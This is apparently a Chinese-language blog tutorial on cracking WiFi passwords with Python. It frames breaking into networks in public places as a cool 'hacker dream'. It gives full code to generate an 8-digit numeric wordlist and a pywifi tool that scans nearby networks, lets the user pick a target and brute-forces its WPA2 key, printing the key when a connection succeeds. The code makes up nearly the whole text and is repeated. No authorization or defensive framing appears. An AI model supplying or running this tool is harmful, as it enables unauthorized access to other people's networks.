WiFi破解应该是我们每个人都有的黑客梦,在某个公共区域,打开电脑,宛如黑客帝国里的操作一样,真帅,哈哈
首先假如WiFi密码是8位数,
1、首先我们需要生成一个密码本来记录所有的可能的热点密码,这个密码本中,需要列举所有的密码的可能性;
2、然后,用 Python 进行自动化的测试密码直到连接成功为止。
一、代码实现
1、生成密码本
密码本的生成其实比较的简单了啦。
思路其实就是对8个位置循环生成0,1。。。。。9的数字。
具体的代码如下:(8个循环嵌套)
import os file_name = "making_pwd.txt" f = open(file_name, "w+") # 打开文件 for i in range(10): # 第一层循环 for j in range(10): # 第二层循环 for k in range(10): # 第三层循环 for q in range(10): # 第四层循环 for m in range(10): # 第五层循环 for n in range(10): # 第六层循环 for o in range(10): # 第七层循环 for p in range(10): # 第八层循环 insert_str = str(i) + str(j) + str(k) + str(q) + \ str(m) + str(n) + str(o) + str(p) # 数据的拼接以及数据类型的转换。 print(insert_str) f.write(insert_str) # 写入密码 f.write("\n") # 一个密码换一次行 f.close() # 关闭文件 print("一个密码本生成完毕了!")
核心代码就是这个循环嵌套,本质也是十分简单的啦:
下面再展示一遍核心代码
file_name = "making_pwd.txt" f = open(file_name, "w+") # 打开文件 for i in range(10): # 第一层循环 for j in range(10): # 第二层循环 for k in range(10): # 第三层循环 for q in range(10): # 第四层循环 for m in range(10): # 第五层循环 for n in range(10): # 第六层循环 for o in range(10): # 第七层循环 for p in range(10): # 第八层循环 insert_str = str(i) + str(j) + str(k) + str(q) + \ str(m) + str(n) + str(o) + str(p) # 数据的拼接以及数据类型的转换。 print(insert_str) f.write(insert_str) # 写入密码 f.write("\n") # 一个密码换一次行 f.close()
这样生成的文件比较大,但是也没有办法了:
2、利用密码本进行自动化的测试
首先说一句,我们需要安装 pywifi 这个模块,没有这个模块的小伙伴可以先安装一下。
然后,我们呢,直接上完整的全部的代码,代码的解析在注释里面都有,注释有详细的代码解释:
import pywifi import time from pywifi import const # 导入模块 # WiFi扫描模块 def wifi_scan(): # 初始化wifi wifi = pywifi.PyWiFi() # 使用第一个无线网卡 interface = wifi.interfaces()[0] # 开始扫描 interface.scan() # 显示扫描的信息。 for i in range(4): time.sleep(1) print('\r扫描可用 WiFi 中,请稍后。。。(' + str(3 - i), end=')') print('\r扫描完成!\n' + '-' * 38) print('\r{:4}{:6}{}'.format('编号', '信号强度', 'wifi名')) # 扫描结果,scan_results()返回一个集,存放的是每个wifi对象 bss = interface.scan_results() # 存放wifi名的集合 wifi_name_set = set() for w in bss: # 解决乱码问题 wifi_name_and_signal = (100 + w.signal, w.ssid.encode('raw_unicode_escape').decode('utf-8')) wifi_name_set.add(wifi_name_and_signal) # 存入列表并按信号排序 wifi_name_list = list(wifi_name_set) wifi_name_list = sorted(wifi_name_list, key=lambda a: a[0], reverse=True) num = 0 # 格式化输出 while num < len(wifi_name_list): print('\r{:<6d}{:<8d}{}'.format(num, wifi_name_list[num][0], wifi_name_list[num][1])) num += 1 print('-' * 38) # 返回wifi列表 return wifi_name_list # WIFI破解模块 def wifi_password_crack(wifi_name): # 字典路径 wifi_dic_path = input("请输入本地用于WIFI暴力破解的密码字典(txt格式,每个密码占据1行)的路径:") with open(wifi_dic_path, 'r') as f: # 遍历密码 for pwd in f: # 去除密码的末尾换行符 pwd = pwd.strip('\n') # 创建wifi对象 wifi = pywifi.PyWiFi() # 创建网卡对象,为第一个wifi网卡 interface = wifi.interfaces()[0] # 断开所有wifi连接 interface.disconnect() # 等待其断开 while interface.status() == 4: # 当其处于连接状态时,利用循环等待其断开 pass # 创建连接文件(对象) profile = pywifi.Profile() # wifi名称 profile.ssid = wifi_name # 需要认证 profile.auth = const.AUTH_ALG_OPEN # wifi默认加密算法 profile.akm.append(const.AKM_TYPE_WPA2PSK) profile.cipher = const.CIPHER_TYPE_CCMP # wifi密码 profile.key = pwd # 删除所有wifi连接文件 interface.remove_all_network_profiles() # 设置新的wifi连接文件 tmp_profile = interface.add_network_profile(profile) # 开始尝试连接 interface.connect(tmp_profile) start_time = time.time() while time.time() - start_time < 1.5: # 接口状态为4代表连接成功(当尝试时间大于1.5秒之后则为错误密码,经测试测正确密码一般都在1.5秒内连接,若要提高准确性可以设置为2s或以上,相应暴力破解速度就会变慢) if interface.status() == 4: print(f'\r连接成功!密码为:{pwd}') exit(0) else: print(f'\r正在利用密码 {pwd} 尝试破解。', end='') # 主函数 def main(): # 退出标致 exit_flag = 0 # 目标编号 target_num = -1 while not exit_flag: try: print('WiFi万能钥匙'.center(35, '-')) # 调用扫描模块,返回一个排序后的wifi列表 wifi_list = wifi_scan() # 让用户选择要破解的wifi编号,并对用户输入的编号进行判断和异常处理 choose_exit_flag = 0 while not choose_exit_flag: try: target_num = int(input('请选择你要尝试破解的wifi:')) # 如果要选择的wifi编号在列表内,继续二次判断,否则重新输入 if target_num in range(len(wifi_list)): # 二次确认 while not choose_exit_flag: try: choose = str(input(f'你选择要破解的WiFi名称是:{wifi_list[target_num][1]},确定吗?(Y/N)')) # 对用户输入进行小写处理,并判断 if choose.lower() == 'y': choose_exit_flag = 1 elif choose.lower() == 'n': break # 处理用户其它字母输入 else: print('只能输入 Y/N 哦o(* ̄︶ ̄*)o') # 处理用户非字母输入 except ValueError: print('只能输入 Y/N 哦o(* ̄︶ ̄*)o') # 退出破解 if choose_exit_flag == 1: break else: print('请重新输入哦(*^▽^*)') except ValueError: print('只能输入数字哦o(* ̄︶ ̄*)o') # 密码破解,传入用户选择的wifi名称 wifi_password_crack(wifi_list[target_num][1]) print('-' * 38) exit_flag = 1 except Exception as e: print(e) raise e if __name__ == '__main__': # main 函数 进行一个测试 main()
这里需要注意下,我们需要手动选择密码本来进行测试,手动选择密码本!!
下面我们分模块进行展示与解说:
导入模块:
import pywifi import time from pywifi import const # 导入模块
这个是定义的使用的扫描WiFi的一个方法,这个方法实现的功能是扫描局域网范围内部的所有可以连接的WiFi,然后打印出来:
# WiFi扫描模块 def wifi_scan(): # 初始化wifi wifi = pywifi.PyWiFi() # 使用第一个无线网卡 interface = wifi.interfaces()[0] # 开始扫描 interface.scan() # 显示扫描的信息。 for i in range(4): time.sleep(1) print('\r扫描可用 WiFi 中,请稍后。。。(' + str(3 - i), end=')') print('\r扫描完成!\n' + '-' * 38) print('\r{:4}{:6}{}'.format('编号', '信号强度', 'wifi名')) # 扫描结果,scan_results()返回一个集,存放的是每个wifi对象 bss = interface.scan_results() # 存放wifi名的集合 wifi_name_set = set() for w in bss: # 解决乱码问题 wifi_name_and_signal = (100 + w.signal, w.ssid.encode('raw_unicode_escape').decode('utf-8')) wifi_name_set.add(wifi_name_and_signal) # 存入列表并按信号排序 wifi_name_list = list(wifi_name_set) wifi_name_list = sorted(wifi_name_list, key=lambda a: a[0], reverse=True) num = 0 # 格式化输出 while num < len(wifi_name_list): print('\r{:<6d}{:<8d}{}'.format(num, wifi_name_list[num][0], wifi_name_list[num][1])) num += 1 print('-' * 38) # 返回wifi列表 return wifi_name_list
这个是使用密码本来进行密码的自动化测试的函数:
# WIFI破解模块 def wifi_password_crack(wifi_name): # 字典路径 wifi_dic_path = input("请输入本地用于WIFI暴力破解的密码字典(txt格式,每个密码占据1行)的路径:") with open(wifi_dic_path, 'r') as f: # 遍历密码 for pwd in f: # 去除密码的末尾换行符 pwd = pwd.strip('\n') # 创建wifi对象 wifi = pywifi.PyWiFi() # 创建网卡对象,为第一个wifi网卡 interface = wifi.interfaces()[0] # 断开所有wifi连接 interface.disconnect() # 等待其断开 while interface.status() == 4: # 当其处于连接状态时,利用循环等待其断开 pass # 创建连接文件(对象) profile = pywifi.Profile() # wifi名称 profile.ssid = wifi_name # 需要认证 profile.auth = const.AUTH_ALG_OPEN # wifi默认加密算法 profile.akm.append(const.AKM_TYPE_WPA2PSK) profile.cipher = const.CIPHER_TYPE_CCMP # wifi密码 profile.key = pwd # 删除所有wifi连接文件 interface.remove_all_network_profiles() # 设置新的wifi连接文件 tmp_profile = interface.add_network_profile(profile) # 开始尝试连接 interface.connect(tmp_profile) start_time = time.time() while time.time() - start_time < 1.5: # 接口状态为4代表连接成功(当尝试时间大于1.5秒之后则为错误密码,经测试测正确密码一般都在1.5秒内连接,若要提高准确性可以设置为2s或以上,相应暴力破解速度就会变慢) if interface.status() == 4: print(f'\r连接成功!密码为:{pwd}') exit(0) else: print(f'\r正在利用密码 {pwd} 尝试破解。', end='')
这个函数是进行实际的操作来实现我们所想要的功能。
# 主函数 def main(): # 退出标致 exit_flag = 0 # 目标编号 target_num = -1 while not exit_flag: try: print('WiFi万能钥匙'.center(35, '-')) # 调用扫描模块,返回一个排序后的wifi列表 wifi_list = wifi_scan() # 让用户选择要破解的wifi编号,并对用户输入的编号进行判断和异常处理 choose_exit_flag = 0 while not choose_exit_flag: try: target_num = int(input('请选择你要尝试破解的wifi:')) # 如果要选择的wifi编号在列表内,继续二次判断,否则重新输入 if target_num in range(len(wifi_list)): # 二次确认 while not choose_exit_flag: try: choose = str(input(f'你选择要破解的WiFi名称是:{wifi_list[target_num][1]},确定吗?(Y/N)')) # 对用户输入进行小写处理,并判断 if choose.lower() == 'y': choose_exit_flag = 1 elif choose.lower() == 'n': break # 处理用户其它字母输入 else: print('只能输入 Y/N 哦o(* ̄︶ ̄*)o') # 处理用户非字母输入 except ValueError: print('只能输入 Y/N 哦o(* ̄︶ ̄*)o') # 退出破解 if choose_exit_flag == 1: break else: print('请重新输入哦(*^▽^*)') except ValueError: print('只能输入数字哦o(* ̄︶ ̄*)o') # 密码破解,传入用户选择的wifi名称 wifi_password_crack(wifi_list[target_num][1]) print('-' * 38) exit_flag = 1 except Exception as e: print(e) raise e
执行代码的一个接口:
if __name__ == '__main__': # main 函数 进行一个测试 main()
3、结果展示
四、后续总结
以上呢,就是我们的使用 Python 工具 Pycharm 来进行破解WiFi的密码的一个案例的介绍,这种方式比较傻瓜式而且暴力,遇到复杂的密码可能就不行了,耗时太多。